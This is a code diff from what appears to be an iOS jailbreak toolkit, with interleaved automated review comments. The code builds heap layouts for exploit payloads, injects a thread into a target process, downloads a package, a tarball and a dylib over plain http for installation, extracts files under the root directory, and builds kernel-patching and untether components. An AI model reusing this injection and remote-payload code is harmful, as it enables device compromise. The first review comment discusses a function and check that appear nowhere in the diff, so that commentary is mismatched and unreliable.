b/goo/goo.py index fd7b045..61f0911 100644 --- a/goo/goo.py +++ b/goo/goo.py 
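Review bot: The comment above the changed test in `union_create` still reads "if this is faulting filesystem and is a reg file, skip allocation of union node", but the new condition `vp != NULLVP && !vnode_isdir(vp)` no longer consults `UNNODE_FAULTIN(un)`. It now matches every non-directory vnode, not only regular files and symlinks. Replace the comment with something like `/* any non-directory is returned as-is, without allocating a union node */`, and say why the fault-in restriction was dropped. `union_create` continues outside the hunk.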
@@ -28,13 +28,20 @@ def simplify(self, addr): def __repr__(self): return '' % self.name -def heapadd(*stuff): +def heapadds(heap, str, align=None, align_offset=0): + if align is not None: # max 16 in saffron + heap.append('\0' * (-(len(heap) - align_offset) & (align - 1))) + result = pointed(str) + heap.append(result) + return result + +def heapadd(*stuff, **kwargs): global heap #heap.dbginfo.append((len(heap), getdebugname())) # so we know where we came from heap.bits.append(debug_marker(getdebugname())) for a in stuff: assert not isinstance(a, (troll_string, str)) or len(a) % 4 == 0 - heap.append(I(a)) + heapadds(heap, I(a), **kwargs) def xrepr(a): if isinstance(a, (int, long)): @@ -69,13 +76,11 @@ def heapdump(heap, names=None): sys.stdout.write('\n') sys.stdout.write('%08x end\n' % pos) -def ptr(str, null_terminate=False, heap=None): +def ptr(str, null_terminate=False, heap=None, align_offset=0, **kwargs): if heap is None: heap = sheap if null_terminate: str += '\0' - str = pad(str, 4) - result = pointed(str) - heap.append(result) - return pointer(result) + str = pad(str, 4, -align_offset & 3) + return pointer(heapadds(heap, str, align_offset=align_offset, **kwargs)) def ptrI(*xs, **kwargs): return ptr(reduce(operator.add, map(I, xs)), **kwargs) @@ -143,7 +148,7 @@ def init(*regs, **kwargs): def finalize(heapaddr=None, must_be_simple=True, should_heapdump=False): global heap, sheap, keep_debugs clear_fwd() - nheap = heap + sheap + nheap = pad(heap, 16) + sheap if should_heapdump: nheap = simplify_times(nheap, heapaddr, 4, False) heapdump(nheap) diff --git a/goo/goop.py b/goo/goop.py index 74b79bb..16c7d21 100644 --- a/goo/goop.py +++ b/goo/goop.py 
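Review bot: `heapadds` in goo/goo.py has no docstring and names its second parameter `str`, which shadows the builtin inside the function; `data` would avoid that. The padding expression `-(len(heap) - align_offset) & (align - 1)` is only correct when `align` is a power of two, and the inline remark `# max 16 in saffron` appears to depend on the `pad(heap, 16)` added to `finalize` in the last hunk of this file. Document both constraints in a docstring, and state the first one in code with `assert align & (align - 1) == 0`.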
@@ -8,9 +8,9 @@ def getdebugname(): if True and ('world' in fn or 'goo' in fn): continue return '%s:%d' % (fn, f.f_lineno) -def pad(x, p): +def pad(x, p, offset=0): l = len(x) - return x + '\0' * (-l & (p - 1)) + return x + '\0' * (-(l - offset) & (p - 1)) def simplify_times(heap, addr, times, must_be_simple=True): for i in xrange(times): @@ -131,6 +131,8 @@ def unpack(self): bits += struct.unpack('I'*(len(bit)/4), bit) elif len(bit) == 0: pass + elif isinstance(bit, troll_string): + bits += bit.unpack() else: raise ValueError('unpack: %r' % bit) return bits diff --git a/install/install.m b/install/install.m index 861b290..6ad9c6d 100644 --- a/install/install.m +++ b/install/install.m @@ -35,7 +35,7 @@ static void wrote_bytes(ssize_t bytes) { // xxx figure this out float total = 36938240.0f; - set_progress(written_bytes / total); + set_progress((written_bytes / total)/* * 0.95*/); } } @@ -173,11 +173,11 @@ static void extract(const char *fn) { } else { chdir("/"); } - tar_extract_file(tar, pathname); - if(strstr(pathname, "LaunchDaemons/") && strstr(pathname, ".plist")) { - _log("queueing ld %s", pathname); - [to_load addObject:[NSData dataWithBytes:pathname length:strlen(pathname)+1]]; + if(!access(pathname, F_OK)) { + _log("skipping %s", pathname); + continue; } + tar_extract_file(tar, pathname); } tar_close(tar); @@ -243,14 +243,6 @@ static void add_afc2() { })); } -static void finish_up() { - return; - for(NSData *pathname in to_load) { - chdir("/"); - run((char *[]) {"/bin/launchctl", "load", (char *) [pathname bytes], NULL}, NULL); - } -} - @interface LSApplicationWorkspace { } +(LSApplicationWorkspace *)defaultWorkspace; 
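Review bot: In `extract` (install/install.m), the new `access(pathname, F_OK)` test followed by `tar_extract_file(tar, pathname)` is a check-then-use pair on a path taken from the archive, and the result of `tar_extract_file` is still ignored. `access` follows symlinks, so a dangling link at `pathname` is treated as absent; `lstat` expresses "something is already there" more accurately. Nothing visible in this hunk rejects member names that are absolute or contain `..`, which should be checked before extracting under `/`. The enclosing loop is outside the hunk, but if it reads headers with libtar's `th_read`, the `continue` path for a regular file also needs `tar_skip_regfile(tar)` so that the reader is not left positioned on that file's data. At minimum, check the extraction result: `if(tar_extract_file(tar, pathname) != 0) _log("extract failed: %s", pathname);`.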
@@ -318,13 +310,15 @@ void do_install(void (*set_progress_)(float)) { TIME(remount()); TIME(dok48()); TIME(add_afc2()); - TIME(make_nulls()); + if(USE_NULL) { + make_nulls(); + } TIME(extract("/tmp/freeze.tar.xz")); TIME(install_starstuff()); - TIME(finish_up()); TIME(uicache()); TIME(post_jailbreak()); - TIME(sync()); + set_progress(1.00); + TIME(sync(), sync(), sync()); _log("final written_bytes = %zd", written_bytes); } diff --git a/locutus/inject.c b/locutus/inject.c index 67f3620..1a5b738 100644 --- a/locutus/inject.c +++ b/locutus/inject.c @@ -60,7 +60,10 @@ kern_return_t inject(pid_t pid, const char *path) { struct arm_thread_state arm; natural_t nat; } state = { { .cpsr = 0x20 } }; - state.arm.pc = baton_address + 8; + state.arm.pc = baton_address; + + vm_machine_attribute_val_t value = MATTR_VAL_CACHE_FLUSH; // ignored by the kernel + _assert_zero(vm_machine_attribute(task, baton_address, baton_size, MATTR_CACHE, &value)); thread_act_t thread; _assert_zero(thread_create_running(task, ARM_THREAD_STATE, &state.nat, ARM_THREAD_STATE_COUNT, &thread)); diff --git a/locutus/locutus.c b/locutus/locutus.c index bb247c6..49afb44 100644 --- a/locutus/locutus.c +++ b/locutus/locutus.c @@ -30,9 +30,8 @@ static const float download_share = 0.50; //#define TINY #ifdef TINY -static void do_nothing_with(CFTypeRef r) {} -#define CFRelease do_nothing_with -#define NSLog(...) +#define CFRelease(args...) ((args), (void) 0) +#define NSLog(args...) ((args), (void) 0) #else extern void NSLog(CFStringRef fmt, ...); #endif 
@@ -64,10 +63,16 @@ static struct request { }; }; } requests[] = { - {CFSTR("http://a.qoid.us/saffron/saffron-jailbreak-%s-%s.deb"), "/tmp/saffron-jailbreak.deb", CFSTR("application/x-debian-package"), {}}, +#if 1 + {CFSTR("http://www.jailbreakme.com/saffron/_/saffron-jailbreak-%s-%s.deb"), "/tmp/saffron-jailbreak.deb", CFSTR("application/x-debian-package"), {}}, + {CFSTR("http://www.jailbreakme.com/saffron/_/freeze.tar.xz"), "/tmp/freeze.tar.xz", CFSTR("application/octet-stream"), {}}, + {CFSTR("http://www.jailbreakme.com/saffron/_/install.dylib"), "/tmp/install.dylib", CFSTR("application/octet-stream"), {}}, +#else + {CFSTR("http://a.qoid.us/omgleak/_/saffron-jailbreak-%s-%s.deb"), "/tmp/saffron-jailbreak.deb", CFSTR("application/x-debian-package"), {}}, //{CFSTR("http://test.saurik.com/dhowett/Cydia-4.1b1-Srk.txz"), "/tmp/freeze.tar.xz", CFSTR("text/plain"), {}}, - {CFSTR("http://a.qoid.us/saffron/Cydia-4.3r4-Raw.tar.xz"), "/tmp/freeze.tar.xz", CFSTR("application/x-tar"), {}}, - {CFSTR("http://a.qoid.us/saffron/install.dylib"), "/tmp/install.dylib", CFSTR("text/plain"), {}}, + {CFSTR("http://a.qoid.us/omgleak/_/freeze.tar.xz"), "/tmp/freeze.tar.xz", CFSTR("application/x-tar"), {}}, + {CFSTR("http://a.qoid.us/omgleak/_/install.dylib"), "/tmp/install.dylib", CFSTR("text/plain"), {}}, +#endif }, *const requests_end = requests + sizeof(requests)/sizeof(*requests); static void did_download(size_t bytes) { @@ -194,6 +199,7 @@ static void request_callback(CFReadStreamRef stream, CFStreamEventType event_typ NSLog(CFSTR("got %@, expected %@"), content_type, r->content_type); handle_error(r, CFStringCreateWithFormat(NULL, NULL, CFSTR("Wrong Content-Type; are you on a fail Wi-Fi network?"))); + break; } } 
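Review bot: All three active entries in `requests[]` fetch code or packages (`saffron-jailbreak-%s-%s.deb`, `freeze.tar.xz`, `install.dylib`) over plain `http://` into fixed names under `/tmp`, and the only validation visible in this file's hunks is the Content-Type comparison in `request_callback`. Anyone on the network path can replace those files, and the Content-Type header is controlled by whoever answers the request, so it is not an integrity check. Verify each download against a digest compiled into the binary before it is used, or fetch over TLS with a pinned certificate, and create the files with `O_EXCL` in a private directory rather than at predictable `/tmp` paths. The `icon_url` strings in the `init` hunk of locutus/locutus_server.m are cleartext as well, and that image is decoded inside the process that loads the server library. How the downloaded files are consumed is outside this hunk.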
@@ -282,11 +288,12 @@ static pid_t find_springboard() { _assert(!sysctl(&name[0], sizeof(name) / sizeof(*name), proc, &length, NULL, 0)); for(size_t i = 0; i < length/sizeof(*proc); i++) { struct extern_proc *ep = &proc[i].kp_proc; + /*if(!strncmp(ep->p_comm, "CommCenter", sizeof(ep->p_comm))) { + kill(ep->p_pid, SIGKILL); + }*/ if(!strncmp(ep->p_comm, "SpringBoard", sizeof(ep->p_comm))) { result = ep->p_pid; - }/* else if(!strncmp(ep->p_comm, "locutus", sizeof(ep->p_comm)) && ep->p_pid != my_pid) { - kill(ep->p_pid, SIGUSR1); - }*/ + } } _assert(result); return result; diff --git a/locutus/locutus_server.m b/locutus/locutus_server.m index 56f614d..9f3cf74 100644 --- a/locutus/locutus_server.m +++ b/locutus/locutus_server.m @@ -102,6 +102,7 @@ static void do_alert(NSString *title, NSString *message, NSString *cancel, NSStr static void (^sk)() = ^{ [alert_view dismissWithClickedButtonIndex:0 animated:YES]; [icon remove]; + [icon release]; icon = nil; [icon_controller setIconToReveal:nil]; close(sock); @@ -128,7 +129,7 @@ static BOOL MyIcon_allowsUninstall(id self, SEL sel) { static void MyIcon_closeBoxTapped(id self, SEL sel) { // don't download behind the user's back write(sock, "p", 1); - do_alert(_(@"Remove Download"), @"Are you sure you want to remove “Cydia”?", (@"GAMECENTER_DELETE_STATS_DELETE"), _(@"UNINSTALL_ICON_CANCEL")); + do_alert(_(@"Remove Download"), @"Are you sure you want to remove “Cydia”?", _(@"GAMECENTER_DELETE_STATS_DELETE"), _(@"UNINSTALL_ICON_CANCEL")); } @@ -161,6 +162,7 @@ static void installed() { #endif [[icon_model applicationIconForDisplayIdentifier:@"com.saurik.Cydia"] reloadIconImage]; } + [icon release]; icon = nil; sk(); } @@ -209,6 +211,8 @@ static void installed() { } } +static void do_nothing() { } + __attribute__((constructor)) static void init() { NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init]; 
@@ -237,15 +241,19 @@ static void init() { icon_model = [objc_getClass("SBIconModel") sharedInstance]; bundle_identifier = (existing_icon = [icon_model applicationIconForDisplayIdentifier:@"com.saurik.Cydia"]) ? @"com.saurik.Cydia.notreally" : @"com.saurik.Cydia"; + Class SBDownloadingIcon = objc_getClass("SBDownloadingIcon"); + char name[32]; sprintf(name, "MyIcon_%p", &init); - MyIcon = objc_allocateClassPair(objc_getClass("SBDownloadingIcon"), name, 0); + MyIcon = objc_allocateClassPair(SBDownloadingIcon, name, 0); #define OVERRIDE(x) class_replaceMethod(MyIcon, @selector(x), (IMP) MyIcon_##x, "") OVERRIDE(displayName); OVERRIDE(applicationBundleID); OVERRIDE(launch); OVERRIDE(allowsUninstall); OVERRIDE(closeBoxTapped); + IMP setDisplayedIconImage = class_getMethodImplementation(SBDownloadingIcon, @selector(setDisplayedIconImage:)); + class_replaceMethod(MyIcon, @selector(setDisplayedIconImage:), (IMP) do_nothing, ""); class_addMethod(MyIcon, @selector(alertView:clickedButtonAtIndex:), (IMP) MyIcon_alertView_clickedButtonAtIndex, "@:@l"); objc_registerClassPair(MyIcon); @@ -263,7 +271,6 @@ static void init() { [icon_model addIcon:icon]; [icon_controller addNewIconToDesignatedLocation:icon animate:NO scrollToList:NO saveIconState:YES]; [icon_controller setIconToReveal:icon]; - [icon release]; if(existing_icon) { write(sock, "p", 1); 
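Review bot: `class_getMethodImplementation(SBDownloadingIcon, @selector(setDisplayedIconImage:))` never returns NULL, because it yields the runtime's forwarding entry point when the class does not implement the selector, and `objc_getClass("SBDownloadingIcon")` is used without a Nil check. On a SpringBoard build where this private class or method differs, the saved pointer would later be called directly and most likely fault. Look the method up first, `Method m = class_getInstanceMethod(SBDownloadingIcon, @selector(setDisplayedIconImage:));`, then `IMP setDisplayedIconImage = m ? method_getImplementation(m) : NULL;`, and skip the override when it is NULL. The replacement is also registered with an empty type encoding, where `"v@:@"` would match the signature used at the call site. `init()` starts and ends outside this hunk.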
@@ -271,12 +278,15 @@ static void init() { } bool _2x = [[UIScreen mainScreen] scale] > 1.5; + bool ipad = [[UIDevice currentDevice] userInterfaceIdiom] == UIUserInterfaceIdiomPad; + NSString *icon_url = _2x ? @"http://a.qoid.us/Cydia@2x.png" : @"http://a.qoid.us/Cydia.png"; + if(ipad) icon_url = @"http://a.qoid.us/Cydia-72.png"; UIImage *icon_image = [UIImage imageWithData:[NSData dataWithContentsOfURL:[NSURL URLWithString:icon_url]]]; if(icon_image) { icon_image = [icon darkenedIconImage:icon_image alpha:0.5]; if(_2x) icon_image = [UIImage imageWithCGImage:[icon_image CGImage] scale:2.0 orientation:UIImageOrientationUp]; - [icon setDisplayedIconImage:icon_image]; + ((void (*)(id self, SEL sel, id image)) setDisplayedIconImage)(icon, nil, icon_image); } }); diff --git a/make.py b/make.py index c07db59..1f29f75 100755 --- a/make.py +++ b/make.py @@ -19,8 +19,10 @@ def hybrid_hasher(filename): def set_firmware(firmware=None, lndir=False): global iversion, device, version, build_num, is_armv7, BUILD_ROOT, BS if firmware is None: - firmware = os.readlink(ROOT + '/config/cur').strip('/').split('/')[-1] - BS = ROOT + '/bs/' + firmware + BS = os.readlink(ROOT + '/config/cur') + firmware = BS.strip('/').split('/')[-1] + else: + BS = ROOT + '/bs/' + firmware device, version, build_num = re.match('(i[A-Z][a-z]+[0-9],[0-9x])_([0-9\.]+)_([A-Z0-9]+)', firmware).groups() is_armv7 = device not in ['iPhone1,1', 'iPhone1,2', 'iPod1,1', 'iPod2,1'] bits = version.split('.') + [0, 0] @@ -90,7 +92,7 @@ def catalog_dejavu(): def catalog_untether(): catalog() run(GCC, '-c', '-o', tmp('kcode_two.o'), 'kcode.S', '-Oz') - run('python', 'catalog.py', 'untether', version, BS+'/cache', BS+'/kern', tmp('patchfile'), tmp('kcode_two.o'), tmp('two.txt')) + run('python', 'catalog.py', 'untether', device, version, BS+'/cache', BS+'/kern', tmp('patchfile'), tmp('kcode_two.o'), tmp('two.txt')) def untether(): catalog_untether() 
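Review bot: The saved implementation is called as `(icon, nil, icon_image)`, so the callee receives a nil `_cmd`; any use of `_cmd` inside the original method (logging, forwarding, a `super` call built from it) then misbehaves. Pass the real selector: `((void (*)(id, SEL, id)) setDisplayedIconImage)(icon, @selector(setDisplayedIconImage:), icon_image);`. The pointer is also called without a NULL check, and the image is loaded with `dataWithContentsOfURL:` from a plain `http://` URL, so its bytes are not authenticated before being decoded. The enclosing block begins outside the hunk.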
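Review bot: When `firmware is None`, `BS` is now the raw `os.readlink()` result, which is returned exactly as stored in the link. If `config/cur` is a relative symlink, `BS+'/cache'` and `BS+'/kern'` resolve against whatever the current directory is when they are used, not against `ROOT/config`. Resolving once with `BS = os.path.realpath(ROOT + '/config/cur')` keeps both branches producing an absolute path. The `re.match(...).groups()` that follows raises `AttributeError` on a directory name that does not match the pattern, so an explicit check with a clear message would be kinder. The rest of `set_firmware` is outside the hunk.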
@@ -172,13 +174,11 @@ def starstuff(): white() untether() goto('starstuff') - compile_stuff(['mount_nulls.c'], 'mount_nulls', ldid=False, gcc=GCC_ARMV6, use_tmp=False, cflags='-DUSE_NULL=%d' % use_null) + compile_stuff(['mount_nulls.c'], 'mount_nulls', ldid=True, gcc=GCC_ARMV6, use_tmp=False, cflags='-DUSE_NULL=%d' % use_null) if use_null: run('../white/universal/white_loader', '-k', BS+'/kern', '-p', tmp('../fs/union.dylib'), tmp('union_prelink.dylib')) - else: - run('touch', tmp('union_prelink.dylib')) package = 'saffron-jailbreak-%s-%s' % (device, build_num) - run('bash', 'build-archive.sh', tmp('.'), package, package.replace(',', '.').lower()) + run('bash', 'build-archive.sh', tmp('.'), package, package.replace(',', '.').lower(), '%d' % use_null) def stage(string=None): all_devices = ['iPhone3,1', 'iPhone3,3', 'iPod4,1', 'iPad2,1', 'iPad2,2', 'iPad2,3', 'iPhone2,1', 'iPod3,1', 'iPad1,1', 'iPhone1,2', 'iPod2,1'] diff --git a/starstuff/build-archive.sh b/starstuff/build-archive.sh index 50289d2..f3285df 100644 --- a/starstuff/build-archive.sh +++ b/starstuff/build-archive.sh @@ -2,7 +2,9 @@ set -xe root="$1/root" mkdir -p "$root"/{DEBIAN,boot,private/var/null} -cp -a "$1"/union_prelink.dylib "$root"/boot/union_prelink.dylib +if [ "$4" = "1" ]; then + cp -a "$1"/union_prelink.dylib "$root"/boot/union_prelink.dylib +fi cp -a "$1"/../catalog/untether "$root"/boot/untether cp -a ../white/white_loader "$root"/boot/white_loader cp -a mount_nulls "$root"/boot/mount_nulls diff --git a/starstuff/root/boot/union_prelink.dylib b/starstuff/root/boot/union_prelink.dylib deleted file mode 100644 index 4ad5df7..0000000 Binary files a/starstuff/root/boot/union_prelink.dylib and /dev/null differ diff --git a/starstuff/root/boot/untether b/starstuff/root/boot/untether deleted file mode 100755 index cd32300..0000000 Binary files a/starstuff/root/boot/untether and /dev/null differ 
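Review bot: The new `if [ "$4" = "1" ]` guard in `build-archive.sh` treats a missing fourth argument the same as `0`, so a caller that still passes three arguments gets an archive without `boot/union_prelink.dylib` and no error, even under `set -xe`. Make the argument mandatory near the top of the script, e.g. `use_null="${4:?usage: build-archive.sh TMPDIR PACKAGE NAME USE_NULL}"`, and test `"$use_null"` instead. The `mkdir -p ... private/var/null` above still runs in both cases, so it is worth confirming that the directory is wanted when the flag is 0.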
diff --git a/starstuff/root/boot/white_loader b/starstuff/root/boot/white_loader deleted file mode 100755 index 28c359b..0000000 Binary files a/starstuff/root/boot/white_loader and /dev/null differ